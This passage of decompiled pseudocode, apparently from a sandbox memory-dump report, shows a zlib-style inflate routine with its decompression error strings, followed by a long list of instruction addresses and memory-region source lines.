                            															_t898 = ( *_t954 & 0x000000ff) << _t1179;
                            															_t954 =  &(_t954[1]);
                            															_t1010 =  *(_t1151 + 0x4c);
                            															_t1103 = _t1103 + _t898;
                            															_t1179 = _t1179 + 8;
                            															 *(_t1192 + 0x10) = _t1103;
                            															_t1185 = _t1185 - 1;
                            															 *(_t1192 + 0x14) = _t954;
                            															__eflags = _t1179 - _t1010;
                            															if(_t1179 < _t1010) {
                            																continue;
                            															} else {
                            																goto L273;
                            															}
                            															goto L362;
                            														}
                            														goto L102;
                            													}
                            												}
                            												goto L362;
                            											case 0x16:
                            												L275:
                            												 *(_t1192 + 0x40) =  *(_t1151 + 0x54);
                            												_t862 =  *( *(_t1151 + 0x54) + ((0x00000001 <<  *(_t1151 + 0x5c)) - 0x00000001 & _t1103) * 4);
                            												__eflags = 0xad - _t1179;
                            												if(0xad <= _t1179) {
                            													L278:
                            													__eflags = _t862 & 0x000000f0;
                            													if((_t862 & 0x000000f0) != 0) {
                            														L284:
                            														_t954 =  *(_t1192 + 0x14);
                            														_t1018 = _t862 >> 0x00000008 & 0x000000ff;
                            														 *(_t1151 + 0x1bc8) =  *(_t1151 + 0x1bc8) + _t1018;
                            														_t1179 = _t1179 - _t1018;
                            														_t1103 = _t1103 >> _t1018;
                            														 *(_t1192 + 0x10) = _t1103;
                            														__eflags = _t862 & 0x00000040;
                            														if((_t862 & 0x00000040) == 0) {
                            															L286:
                            															 *(_t1151 + 4) = 0x3f4b;
                            															_t864 = _t862 & 0xf;
                            															__eflags = _t864;
                            															 *(_t1151 + 0x48) = _t862 >> 0x10;
                            															 *(_t1151 + 0x4c) = _t864;
                            															goto L287;
                            														} else {
                            															L285:
                            															_t982 =  *(_t1192 + 0x48);
                            															_t982[6] = "invalid distance code";
                            															 *(_t1151 + 4) = 0x3f51;
                            															goto L178;
                            														}
                            													} else {
                            														L279:
                            														_t1028 = _t862 >> 8;
                            														_t1119 = _t862;
                            														 *(_t1192 + 0x30) = _t1028;
                            														 *(_t1192 + 0x34) = _t1119;
                            														_t862 =  *( *(_t1192 + 0x40) + ((((0x00000001 << (_t862 & 0x000000ff) + (_t1028 & 0x000000ff)) - 0x00000001 &  *(_t1192 + 0x10)) >> (_t1028 & 0x000000ff)) + (_t862 >> 0x10)) * 4);
                            														__eflags = (_t862 >> 0x00000008 & 0x000000ff) + ( *(_t1192 + 0x30) & 0x000000ff) - _t1179;
                            														if((_t862 >> 0x00000008 & 0x000000ff) + ( *(_t1192 + 0x30) & 0x000000ff) <= _t1179) {
                            															L283:
                            															_t1151 =  *((intOrPtr*)(_t1192 + 0x24));
                            															_t1037 = _t1119 & 0x000000ff;
                            															_t1179 = _t1179 - _t1037;
                            															_t1103 =  *(_t1192 + 0x10) >> _t1037;
                            															_t631 = _t1151 + 0x1bc8;
                            															 *_t631 =  *(_t1151 + 0x1bc8) + _t1037;
                            															__eflags =  *_t631;
                            															goto L284;
                            														} else {
                            															L280:
                            															while(1) {
                            																L281:
                            																__eflags = _t1185;
                            																if(_t1185 == 0) {
                            																	goto L102;
                            																}
                            																L282:
                            																_t970 =  *(_t1192 + 0x14);
                            																_t1038 = _t1179;
                            																_t1179 = _t1179 + 8;
                            																_t1185 = _t1185 - 1;
                            																 *(_t1192 + 0x10) =  *(_t1192 + 0x10) + (( *_t970 & 0x000000ff) << _t1038);
                            																 *(_t1192 + 0x14) =  &(_t970[1]);
                            																_t972 = _t1119 & 0x000000ff;
                            																_t862 =  *( *((intOrPtr*)( *((intOrPtr*)(_t1192 + 0x24)) + 0x54)) + ((((0x00000001 << (_t1119 & 0x000000ff) + _t972) - 0x00000001 &  *(_t1192 + 0x10)) >> _t972) + ( *(_t1192 + 0x36) & 0x0000ffff)) * 4);
                            																__eflags = (_t862 >> 0x00000008 & 0x000000ff) + _t972 - _t1179;
                            																if((_t862 >> 0x00000008 & 0x000000ff) + _t972 > _t1179) {
                            																	continue;
                            																} else {
                            																	goto L283;
                            																}
                            																goto L362;
                            															}
                            															goto L102;
                            														}
                            													}
                            												} else {
                            													while(1) {
                            														L276:
                            														__eflags = _t1185;
                            														if(_t1185 == 0) {
                            															goto L102;
                            														}
                            														L277:
                            														_t891 = ( *_t954 & 0x000000ff) << _t1179;
                            														_t954 =  &(_t954[1]);
                            														_t1179 = _t1179 + 8;
                            														 *(_t1192 + 0x10) = _t1103 + _t891;
                            														_t1185 = _t1185 - 1;
                            														 *(_t1192 + 0x14) = _t954;
                            														_t862 =  *( *(_t1151 + 0x54) + ((0x00000001 <<  *(_t1151 + 0x5c)) - 0x00000001 &  *(_t1192 + 0x10)) * 4);
                            														_t1103 =  *(_t1192 + 0x10);
                            														__eflags = (_t862 >> 0x00000008 & 0x000000ff) - _t1179;
                            														if((_t862 >> 0x00000008 & 0x000000ff) > _t1179) {
                            															continue;
                            														} else {
                            															goto L278;
                            														}
                            														goto L362;
                            													}
                            													goto L102;
                            												}
                            												goto L362;
                            											case 0x17:
                            												L287:
                            												_t1021 =  *(_t1151 + 0x4c);
                            												__eflags = _t1021;
                            												if(_t1021 == 0) {
                            													L292:
                            													 *(_t1151 + 4) = 0x3f4c;
                            													goto L293;
                            												} else {
                            													L288:
                            													__eflags = _t1179 - _t1021;
                            													if(_t1179 >= _t1021) {
                            														L291:
                            														_t1179 = _t1179 - _t1021;
                            														_t881 = (0x00000001 << _t1021) - 0x00000001 & _t1103;
                            														_t1103 = _t1103 >> _t1021;
                            														 *(_t1151 + 0x48) =  *(_t1151 + 0x48) + _t881;
                            														_t651 = _t1151 + 0x1bc8;
                            														 *_t651 =  *(_t1151 + 0x1bc8) + _t1021;
                            														__eflags =  *_t651;
                            														 *(_t1192 + 0x10) = _t1103;
                            														goto L292;
                            													} else {
                            														while(1) {
                            															L289:
                            															__eflags = _t1185;
                            															if(_t1185 == 0) {
                            																goto L102;
                            															}
                            															L290:
                            															_t883 = ( *_t954 & 0x000000ff) << _t1179;
                            															_t954 =  &(_t954[1]);
                            															_t1021 =  *(_t1151 + 0x4c);
                            															_t1103 = _t1103 + _t883;
                            															_t1179 = _t1179 + 8;
                            															 *(_t1192 + 0x10) = _t1103;
                            															_t1185 = _t1185 - 1;
                            															 *(_t1192 + 0x14) = _t954;
                            															__eflags = _t1179 - _t1021;
                            															if(_t1179 < _t1021) {
                            																continue;
                            															} else {
                            																goto L291;
                            															}
                            															goto L362;
                            														}
                            														goto L102;
                            													}
                            												}
                            												goto L362;
                            											case 0x18:
                            												L293:
                            												_t1022 =  *(_t1192 + 0x1c);
                            												__eflags = _t1022;
                            												if(_t1022 == 0) {
                            													goto L102;
                            												} else {
                            													L294:
                            													_t866 =  *((intOrPtr*)(_t1192 + 0x28)) - _t1022;
                            													_t1023 =  *(_t1151 + 0x48);
                            													__eflags = _t1023 - _t866;
                            													if(_t1023 <= _t866) {
                            														L303:
                            														_t868 =  *(_t1192 + 0x20) - _t1023;
                            														__eflags = _t868;
                            														 *(_t1192 + 0x34) = _t868;
                            														_t869 =  *(_t1151 + 0x44);
                            														goto L304;
                            													} else {
                            														L295:
                            														_t1024 = _t1023 - _t866;
                            														__eflags = _t1024 -  *((intOrPtr*)(_t1151 + 0x30));
                            														if(_t1024 <=  *((intOrPtr*)(_t1151 + 0x30))) {
                            															L298:
                            															_t872 =  *((intOrPtr*)(_t1151 + 0x34));
                            															__eflags = _t1024 - _t872;
                            															if(_t1024 <= _t872) {
                            																_t875 =  *((intOrPtr*)(_t1151 + 0x38)) - _t1024 +  *((intOrPtr*)(_t1151 + 0x34));
                            																__eflags = _t875;
                            															} else {
                            																_t1024 = _t1024 - _t872;
                            																_t875 =  *((intOrPtr*)(_t1151 + 0x38)) +  *((intOrPtr*)(_t1151 + 0x2c)) - _t1024;
                            															}
                            															 *(_t1192 + 0x34) = _t875;
                            															_t869 =  *(_t1151 + 0x44);
                            															__eflags = _t1024 - _t869;
                            															if(_t1024 > _t869) {
                            																L302:
                            																L304:
                            																_t1024 = _t869;
                            															}
                            															L305:
                            															_t960 =  *(_t1192 + 0x1c);
                            															__eflags = _t1024 - _t960;
                            															_t1025 = (_t1024 > _t960) ? _t960 : _t1024;
                            															 *(_t1192 + 0x1c) = _t960 - _t1025;
                            															 *(_t1151 + 0x44) = _t869 - _t1025;
                            															_t1158 =  *(_t1192 + 0x20);
                            															_t963 =  *(_t1192 + 0x34) - _t1158;
                            															__eflags = _t963;
                            															do {
                            																L306:
                            																 *_t1158 = _t1158[_t963];
                            																_t1158 =  &(_t1158[1]);
                            																_t1025 = _t1025 - 1;
                            																__eflags = _t1025;
                            															} while (_t1025 != 0);
                            															_t954 =  *(_t1192 + 0x14);
                            															 *(_t1192 + 0x20) = _t1158;
                            															_t1151 =  *((intOrPtr*)(_t1192 + 0x24));
                            															__eflags =  *(_t1151 + 0x44) - _t1025;
                            															if( *(_t1151 + 0x44) == _t1025) {
                            																 *(_t1151 + 4) = 0x3f48;
                            															}
                            															L177:
                            															_t982 =  *(_t1192 + 0x48);
                            														} else {
                            															L296:
                            															__eflags =  *(_t1151 + 0x1bc4);
                            															if( *(_t1151 + 0x1bc4) == 0) {
                            																goto L298;
                            															} else {
                            																L297:
                            																_t982 =  *(_t1192 + 0x48);
                            																_t982[6] = "invalid distance too far back";
                            																 *(_t1151 + 4) = 0x3f51;
                            															}
                            														}
                            													}
                            													goto L178;
                            												}
                            												goto L362;
                            											case 0x19:
                            												L309:
                            												__eflags =  *(__esp + 0x1c);
                            												if( *(__esp + 0x1c) == 0) {
                            													goto L102;
                            												} else {
                            													L310:
                            													__ebx =  *(__esp + 0x20);
                            													__al =  *(__edi + 0x44);
                            													 *(__esp + 0x20) =  *(__esp + 0x20) + 1;
                            													 *(__esp + 0x1c) =  *(__esp + 0x1c) - 1;
                            													 *( *(__esp + 0x20)) = __al;
                            													__ebx =  *(__esp + 0x14);
                            													 *(__edi + 4) = 0x3f48;
                            													goto L178;
                            												}
                            												goto L362;
                            											case 0x1a:
                            												L311:
                            												__eflags =  *(__edi + 0xc);
                            												__eflags = __al;
                            												if(__al == 0) {
                            													L329:
                            													 *(__edi + 4) = 0x3f4f;
                            													goto L330;
                            												} else {
                            													L313:
                            													__eflags = __esi - 0x20;
                            													if(__esi >= 0x20) {
                            														L317:
                            														__eax =  *(__esp + 0x28);
                            														__eax =  *(__esp + 0x28) -  *(__esp + 0x1c);
                            														 *((intOrPtr*)(__ecx + 0x14)) =  *((intOrPtr*)(__ecx + 0x14)) + __eax;
                            														 *((intOrPtr*)(__edi + 0x20)) =  *((intOrPtr*)(__edi + 0x20)) + __eax;
                            														__eflags =  *(__edi + 0xc) & 0x00000004;
                            														 *(__esp + 0x28) = __eax;
                            														if(( *(__edi + 0xc) & 0x00000004) != 0) {
                            															__eflags = __eax;
                            															if(__eax != 0) {
                            																_push(__eax);
                            																 *((intOrPtr*)(__esp + 0x24)) =  *((intOrPtr*)(__esp + 0x24)) -  *((intOrPtr*)(__esp + 0x2c));
                            																__eflags =  *(__edi + 0x14);
                            																_push( *((intOrPtr*)(__esp + 0x24)) -  *((intOrPtr*)(__esp + 0x2c)));
                            																_push( *(__edi + 0x1c));
                            																if( *(__edi + 0x14) == 0) {
                            																	__eax = L01316A20();
                            																} else {
                            																	__eax = E01316CA0();
                            																}
                            																__ecx =  *(__esp + 0x54);
                            																__esp = __esp + 0xc;
                            																__edx =  *(__esp + 0x10);
                            																 *(__edi + 0x1c) = __eax;
                            																 *(__ecx + 0x30) = __eax;
                            															}
                            														}
                            														__eflags =  *(__edi + 0xc) & 0x00000004;
                            														__eax =  *(__esp + 0x1c);
                            														 *(__esp + 0x28) =  *(__esp + 0x1c);
                            														if(( *(__edi + 0xc) & 0x00000004) == 0) {
                            															L328:
                            															__edx = 0;
                            															__esi = 0;
                            															__eflags = 0;
                            															 *(__esp + 0x10) = 0;
                            															goto L329;
                            														} else {
                            															L324:
                            															__eflags =  *(__edi + 0x14);
                            															__ecx = __edx;
                            															if( *(__edi + 0x14) == 0) {
                            																__ecx = __ecx & 0x0000ff00;
                            																__edx = __edx << 0x10;
                            																__ecx = __ecx + (__edx << 0x10);
                            																__edx = __edx >> 8;
                            																__eax = __edx >> 0x00000008 & 0x0000ff00;
                            																__ecx = __ecx << 8;
                            																__ecx = __ecx + (__edx >> 0x00000008 & 0x0000ff00);
                            																__edx = __edx >> 0x18;
                            																__ecx = __ecx + (__edx >> 0x18);
                            																__eflags = __ecx;
                            															}
                            															__eflags = __ecx -  *(__edi + 0x1c);
                            															if(__ecx ==  *(__edi + 0x1c)) {
                            																goto L328;
                            															} else {
                            																L327:
                            																__ecx =  *(__esp + 0x48);
                            																 *(__ecx + 0x18) = "incorrect data check";
                            																 *(__edi + 4) = 0x3f51;
                            																goto L178;
                            															}
                            														}
                            													} else {
                            														while(1) {
                            															L314:
                            															__eflags = __ebp;
                            															if(__ebp == 0) {
                            																goto L102;
                            															}
                            															L315:
                            															__eax =  *__ebx & 0x000000ff;
                            															__ecx = __esi;
                            															__eax = ( *__ebx & 0x000000ff) << __cl;
                            															__ebx = __ebx + 1;
                            															__edx = __edx + __eax;
                            															 *(__esp + 0x14) = __ebx;
                            															__esi = __esi + 8;
                            															 *(__esp + 0x10) = __edx;
                            															__ebp = __ebp - 1;
                            															__eflags = __esi - 0x20;
                            															if(__esi < 0x20) {
                            																continue;
                            															} else {
                            																L316:
                            																__ecx =  *(__esp + 0x48);
                            																goto L317;
                            															}
                            															goto L362;
                            														}
                            														goto L102;
                            													}
                            												}
                            												goto L362;
                            											case 0x1b:
                            												L330:
                            												__eflags =  *(__edi + 0xc);
                            												if( *(__edi + 0xc) == 0) {
                            													L340:
                            													 *(__edi + 4) = 0x3f50;
                            													goto L341;
                            												} else {
                            													L331:
                            													__eflags =  *(__edi + 0x14);
                            													if( *(__edi + 0x14) == 0) {
                            														goto L340;
                            													} else {
                            														L332:
                            														__eflags = __esi - 0x20;
                            														if(__esi >= 0x20) {
                            															L336:
                            															__eflags = __edx -  *((intOrPtr*)(__edi + 0x20));
                            															if(__edx ==  *((intOrPtr*)(__edi + 0x20))) {
                            																L339:
                            																__ecx = 0;
                            																__esi = 0;
                            																__eflags = 0;
                            																 *(__esp + 0x10) = 0;
                            																goto L340;
                            															} else {
                            																L337:
                            																__ecx =  *(__esp + 0x48);
                            																 *(__ecx + 0x18) = "incorrect length check";
                            																 *(__edi + 4) = 0x3f51;
                            																goto L178;
                            															}
                            														} else {
                            															L333:
                            															while(1) {
                            																L334:
                            																__eflags = __ebp;
                            																if(__ebp == 0) {
                            																	goto L102;
                            																}
                            																L335:
                            																__eax =  *__ebx & 0x000000ff;
                            																__ecx = __esi;
                            																__eax = ( *__ebx & 0x000000ff) << __cl;
                            																__ebx = __ebx + 1;
                            																__edx = __edx + __eax;
                            																 *(__esp + 0x14) = __ebx;
                            																__esi = __esi + 8;
                            																 *(__esp + 0x10) = __edx;
                            																__ebp = __ebp - 1;
                            																__eflags = __esi - 0x20;
                            																if(__esi < 0x20) {
                            																	continue;
                            																} else {
                            																	goto L336;
                            																}
                            																goto L362;
                            															}
                            															goto L102;
                            														}
                            													}
                            												}
                            												goto L362;
                            											case 0x1c:
                            												L341:
                            												 *((intOrPtr*)(__esp + 0x2c)) = 1;
                            												goto L102;
                            											case 0x1d:
                            												L342:
                            												 *((intOrPtr*)(__esp + 0x2c)) = 0xfffffffd;
                            												goto L102;
                            											case 0x1e:
                            												goto L111;
                            										}
                            									}
                            									L179:
                            									return 0xfffffffe;
                            								}
                            							} else {
                            								L188:
                            								do {
                            									L189:
                            									if(_t1179 >= 3) {
                            										goto L192;
                            									} else {
                            										while(1) {
                            											L190:
                            											if(_t1185 == 0) {
                            												goto L102;
                            											}
                            											L191:
                            											_t953 = ( *_t954 & 0x000000ff) << _t1179;
                            											_t954 =  &(_t954[1]);
                            											_t1103 = _t1103 + _t953;
                            											 *(_t1192 + 0x14) = _t954;
                            											_t1179 = _t1179 + 8;
                            											 *(_t1192 + 0x10) = _t1103;
                            											_t1185 = _t1185 - 1;
                            											if(_t1179 < 3) {
                            												continue;
                            											} else {
                            												goto L192;
                            											}
                            											goto L362;
                            										}
                            										goto L102;
                            									}
                            									goto L362;
                            									L192:
                            									_t1101 = _t1103 & 0x00000007;
                            									_t1103 = _t1103 >> 3;
                            									_t1179 = _t1179 - 3;
                            									 *(_t1192 + 0x10) = _t1103;
                            									 *(_t1151 + 0x74 + ( *(0x13322b0 +  *(_t1151 + 0x6c) * 2) & 0x0000ffff) * 2) = _t1101;
                            									 *(_t1151 + 0x6c) =  *(_t1151 + 0x6c) + 1;
                            								} while ( *(_t1151 + 0x6c) <  *((intOrPtr*)(_t1151 + 0x60)));
                            								goto L193;
                            							}
                            						}
                            					}
                            					goto L362;
                            				}
                            			}
                            0x01315530
                            0x01315534
                            0x01315536
                            0x00000000
                            0x00000000
                            0x01315538
                            0x01315538
                            0x0131553a
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0131553a
                            0x0131553c
                            0x0131553c
                            0x01315543
                            0x01315547
                            0x01315549
                            0x0131554d
                            0x0131554f
                            0x01315550
                            0x01315551
                            0x01315554
                            0x01315559
                            0x0131555d
                            0x01315560
                            0x01315563
                            0x01315563
                            0x0131554d
                            0x01315567
                            0x01315569
                            0x0131556b
                            0x0131556f
                            0x01315571
                            0x00000000
                            0x01315577
                            0x01315577
                            0x01315587
                            0x01315587
                            0x0131558b
                            0x00000000
                            0x0131558b
                            0x01315571
                            0x013154f4
                            0x00000000
                            0x00000000
                            0x01315592
                            0x01315592
                            0x01315599
                            0x013155f0
                            0x013155f0
                            0x013155f3
                            0x013155f5
                            0x013155fa
                            0x013155fd
                            0x013155fd
                            0x01315600
                            0x01315603
                            0x01315606
                            0x01315606
                            0x0131560d
                            0x0131560f
                            0x01315611
                            0x01315613
                            0x01315618
                            0x0131561c
                            0x0131561f
                            0x01315623
                            0x01315626
                            0x01315629
                            0x00000000
                            0x0131559b
                            0x0131559b
                            0x0131559b
                            0x0131559e
                            0x013155c3
                            0x013155c3
                            0x013155c7
                            0x013155e8
                            0x013155e8
                            0x013155ea
                            0x013155ea
                            0x013155ec
                            0x00000000
                            0x013155c9
                            0x013155c9
                            0x013155c9
                            0x013155cd
                            0x013155cf
                            0x00000000
                            0x013155d1
                            0x013155d1
                            0x013155d1
                            0x013155d5
                            0x013155dc
                            0x013155dc
                            0x013155cf
                            0x00000000
                            0x013155a0
                            0x013155a0
                            0x013155a0
                            0x013155a0
                            0x013155a2
                            0x00000000
                            0x00000000
                            0x013155a8
                            0x013155a8
                            0x013155ab
                            0x013155ad
                            0x013155af
                            0x013155b0
                            0x013155b2
                            0x013155b6
                            0x013155b9
                            0x013155bd
                            0x013155be
                            0x013155c1
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013155c1
                            0x00000000
                            0x013155a0
                            0x0131559e
                            0x00000000
                            0x00000000
                            0x01315635
                            0x01315635
                            0x01315638
                            0x01315663
                            0x01315663
                            0x01315667
                            0x01315670
                            0x01315674
                            0x01315677
                            0x0131567a
                            0x0131567f
                            0x01315681
                            0x01315684
                            0x01315688
                            0x0131568a
                            0x0131568c
                            0x0131568f
                            0x01315693
                            0x01315693
                            0x01315695
                            0x01315698
                            0x00000000
                            0x0131563a
                            0x0131563a
                            0x0131563a
                            0x01315640
                            0x01315640
                            0x01315640
                            0x01315642
                            0x00000000
                            0x00000000
                            0x01315648
                            0x01315648
                            0x0131564b
                            0x0131564d
                            0x0131564f
                            0x01315650
                            0x01315652
                            0x01315656
                            0x01315659
                            0x0131565d
                            0x0131565e
                            0x01315661
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01315661
                            0x00000000
                            0x01315640
                            0x00000000
                            0x00000000
                            0x0131569f
                            0x0131569f
                            0x013156a3
                            0x0131640f
                            0x0131640f
                            0x01316413
                            0x01316416
                            0x0131641a
                            0x0131641d
                            0x01316422
                            0x01316424
                            0x01316427
                            0x0131642a
                            0x0131642b
                            0x0131642c
                            0x0131642d
                            0x01316430
                            0x01316431
                            0x01316434
                            0x013156a9
                            0x013156a9
                            0x013156a9
                            0x013156ab
                            0x013156ad
                            0x013156af
                            0x013156b4
                            0x013156b8
                            0x013156bb
                            0x013156bf
                            0x013156c2
                            0x013156c5
                            0x00000000
                            0x013156c5
                            0x00000000
                            0x00000000
                            0x013156cc
                            0x013156cc
                            0x013156d0
                            0x013156d3
                            0x0131646e
                            0x0131646e
                            0x01316472
                            0x00000000
                            0x013156d9
                            0x013156d9
                            0x013156d9
                            0x013156dc
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013156dc
                            0x00000000
                            0x00000000
                            0x013156e2
                            0x013156e2
                            0x013156e6
                            0x01315701
                            0x01315701
                            0x01315704
                            0x01315729
                            0x01315729
                            0x0131572b
                            0x01315730
                            0x01315735
                            0x01315738
                            0x00000000
                            0x0131573f
                            0x0131573f
                            0x00000000
                            0x00000000
                            0x01315759
                            0x01315759
                            0x0131575e
                            0x01315765
                            0x0131576c
                            0x01315773
                            0x0131577a
                            0x01315781
                            0x01315746
                            0x01315746
                            0x0131574a
                            0x0131574d
                            0x01315750
                            0x00000000
                            0x01315783
                            0x01315783
                            0x01315783
                            0x01315786
                            0x01315789
                            0x00000000
                            0x01315789
                            0x00000000
                            0x00000000
                            0x01315792
                            0x01315792
                            0x01315796
                            0x01315799
                            0x0131579c
                            0x013157a3
                            0x00000000
                            0x00000000
                            0x013157ac
                            0x013157ac
                            0x013157b0
                            0x013157b3
                            0x013157b6
                            0x013157ba
                            0x013157c1
                            0x00000000
                            0x00000000
                            0x01315706
                            0x01315706
                            0x01315706
                            0x01315706
                            0x01315708
                            0x00000000
                            0x00000000
                            0x0131570e
                            0x0131570e
                            0x01315711
                            0x01315713
                            0x01315715
                            0x01315716
                            0x01315718
                            0x0131571c
                            0x0131571f
                            0x01315723
                            0x01315724
                            0x01315727
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01315727
                            0x00000000
                            0x01315706
                            0x013156e8
                            0x013156e8
                            0x013156e8
                            0x013156ea
                            0x013156f1
                            0x013156f4
                            0x013156f6
                            0x013156f8
                            0x00000000
                            0x013156f8
                            0x00000000
                            0x00000000
                            0x013157cd
                            0x013157cf
                            0x013157d2
                            0x013157d4
                            0x013157d6
                            0x013157da
                            0x013157dd
                            0x01315803
                            0x01315803
                            0x01315805
                            0x0131580a
                            0x0131580d
                            0x0131580f
                            0x01315825
                            0x01315825
                            0x01315827
                            0x0131582a
                            0x0131582c
                            0x01315830
                            0x01315835
                            0x0131583c
                            0x01316467
                            0x01316467
                            0x00000000
                            0x01315842
                            0x01315842
                            0x01315842
                            0x00000000
                            0x01315842
                            0x01315811
                            0x01315811
                            0x01315811
                            0x01315815
                            0x0131581c
                            0x00000000
                            0x0131581c
                            0x013157e0
                            0x00000000
                            0x013157e0
                            0x013157e0
                            0x013157e0
                            0x013157e2
                            0x00000000
                            0x00000000
                            0x013157e8
                            0x013157e8
                            0x013157eb
                            0x013157ed
                            0x013157ef
                            0x013157f0
                            0x013157f2
                            0x013157f6
                            0x013157f9
                            0x013157fd
                            0x013157fe
                            0x01315801
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01315801
                            0x00000000
                            0x013157e0
                            0x00000000
                            0x00000000
                            0x01315846
                            0x01315846
                            0x00000000
                            0x00000000
                            0x0131584d
                            0x0131584d
                            0x01315850
                            0x01315852
                            0x013158b9
                            0x013158b9
                            0x00000000
                            0x01315854
                            0x01315854
                            0x01315854
                            0x01315856
                            0x01315859
                            0x0131585d
                            0x01315862
                            0x01315866
                            0x01315868
                            0x00000000
                            0x0131586e
                            0x0131586e
                            0x01315874
                            0x01315879
                            0x01315880
                            0x01315884
                            0x01315886
                            0x0131588a
                            0x0131588c
                            0x0131588c
                            0x0131588c
                            0x0131588f
                            0x00000000
                            0x0131588f
                            0x01315868
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01315a40
                            0x01315a46
                            0x01315a49
                            0x01315c83
                            0x01315c83
                            0x01315c8a
                            0x01315893
                            0x01315893
                            0x00000000
                            0x01315c90
                            0x01315c90
                            0x01315c90
                            0x01315c98
                            0x01315ccc
                            0x01315ccc
                            0x01315cd2
                            0x01315cdc
                            0x01315cdf
                            0x01315cf6
                            0x01315cfb
                            0x01315cfe
                            0x01315d02
                            0x01315d04
                            0x01315d21
                            0x01315d27
                            0x01315d33
                            0x01315d4b
                            0x01315d50
                            0x01315d53
                            0x01315d57
                            0x01315d59
                            0x01315d76
                            0x01315d76
                            0x01315d7a
                            0x01315d81
                            0x01315d84
                            0x0131645e
                            0x0131645e
                            0x00000000
                            0x01315d8a
                            0x01315d8a
                            0x01315d8a
                            0x01315d8e
                            0x00000000
                            0x01315d8e
                            0x01315d5b
                            0x01315d5b
                            0x01315d5b
                            0x01315d5f
                            0x01315d63
                            0x01315d6a
                            0x00000000
                            0x01315d6a
                            0x01315d06
                            0x01315d06
                            0x01315d06
                            0x01315d0a
                            0x01315d0e
                            0x01315d15
                            0x00000000
                            0x01315d15
                            0x01315c9a
                            0x01315c9a
                            0x01315c9a
                            0x01315c9e
                            0x01315ca2
                            0x01315ca9
                            0x00000000
                            0x01315ca9
                            0x01315c98
                            0x01315a4f
                            0x01315a4f
                            0x01315a4f
                            0x01315a53
                            0x01315a53
                            0x01315a6a
                            0x01315a75
                            0x01315a79
                            0x01315a7b
                            0x01315ac8
                            0x01315aca
                            0x01315acd
                            0x01315ad1
                            0x01315af8
                            0x01315af8
                            0x01315b72
                            0x01315b72
                            0x01315b78
                            0x01315b7c
                            0x01315b7f
                            0x01315bce
                            0x01315bce
                            0x01315bd1
                            0x01315bd5
                            0x01315bd7
                            0x01315c06
                            0x01315c06
                            0x01315c10
                            0x01315c10
                            0x01315c13
                            0x01315c17
                            0x00000000
                            0x01315be0
                            0x00000000
                            0x01315be0
                            0x01315be0
                            0x01315be0
                            0x01315be2
                            0x00000000
                            0x00000000
                            0x01315be8
                            0x01315bed
                            0x01315bef
                            0x01315bf0
                            0x01315bf2
                            0x01315bf6
                            0x01315bf9
                            0x01315bfd
                            0x01315bfe
                            0x01315c00
                            0x00000000
                            0x01315c02
                            0x01315c02
                            0x01315c02
                            0x00000000
                            0x01315c02
                            0x00000000
                            0x01315c00
                            0x00000000
                            0x01315be0
                            0x01315b81
                            0x01315b81
                            0x01315b81
                            0x01315b84
                            0x01315b88
                            0x01315b8a
                            0x01315bb6
                            0x01315bb6
                            0x01315bc0
                            0x01315bc3
                            0x01315bc7
                            0x01315c1c
                            0x01315c1c
                            0x01315c22
                            0x01315c22
                            0x01315c24
                            0x00000000
                            0x01315b90
                            0x00000000
                            0x01315b90
                            0x01315b90
                            0x01315b90
                            0x01315b92
                            0x00000000
                            0x00000000
                            0x01315b98
                            0x01315b9d
                            0x01315b9f
                            0x01315ba0
                            0x01315ba2
                            0x01315ba6
                            0x01315ba9
                            0x01315bad
                            0x01315bae
                            0x01315bb0
                            0x00000000
                            0x01315bb2
                            0x01315bb2
                            0x01315bb2
                            0x00000000
                            0x01315bb2
                            0x00000000
                            0x01315bb0
                            0x00000000
                            0x01315b90
                            0x01315b8a
                            0x01315afa
                            0x01315afa
                            0x01315b02
                            0x01315b05
                            0x01315b09
                            0x01315b0b
                            0x01315b34
                            0x01315b34
                            0x01315b3c
                            0x01315b3f
                            0x01315b41
                            0x01315b43
                            0x01315b46
                            0x01315b4a
                            0x01315b4c
                            0x01315cb5
                            0x01315cb5
                            0x01315cb9
                            0x01315cc0
                            0x00000000
                            0x01315b52
                            0x01315b52
                            0x01315b57
                            0x01315b5d
                            0x01315b60
                            0x01315b66
                            0x01315b69
                            0x01315c2c
                            0x01315c39
                            0x01315c3d
                            0x01315c3f
                            0x00000000
                            0x01315c41
                            0x01315c41
                            0x01315c41
                            0x01315c45
                            0x01315c50
                            0x01315c50
                            0x01315c53
                            0x01315c58
                            0x01315c5b
                            0x01315c5e
                            0x01315c62
                            0x01315c62
                            0x01315c62
                            0x01315c67
                            0x01315c6b
                            0x01315c6d
                            0x00000000
                            0x01315c6d
                            0x01315c3f
                            0x01315b10
                            0x00000000
                            0x01315b10
                            0x01315b10
                            0x01315b10
                            0x01315b12
                            0x00000000
                            0x00000000
                            0x01315b18
                            0x01315b1d
                            0x01315b1f
                            0x01315b20
                            0x01315b22
                            0x01315b26
                            0x01315b29
                            0x01315b2d
                            0x01315b2e
                            0x01315b32
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01315b32
                            0x00000000
                            0x01315b10
                            0x01315b0b
                            0x01315ad3
                            0x01315ad3
                            0x01315ad6
                            0x01315ad9
                            0x01315adb
                            0x01315add
                            0x01315ae1
                            0x01315ae8
                            0x01315aed
                            0x01315af0
                            0x00000000
                            0x01315af0
                            0x01315a80
                            0x00000000
                            0x01315a80
                            0x01315a80
                            0x01315a80
                            0x01315a82
                            0x00000000
                            0x00000000
                            0x01315a88
                            0x01315a94
                            0x01315a96
                            0x01315a9b
                            0x01315a9e

                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp
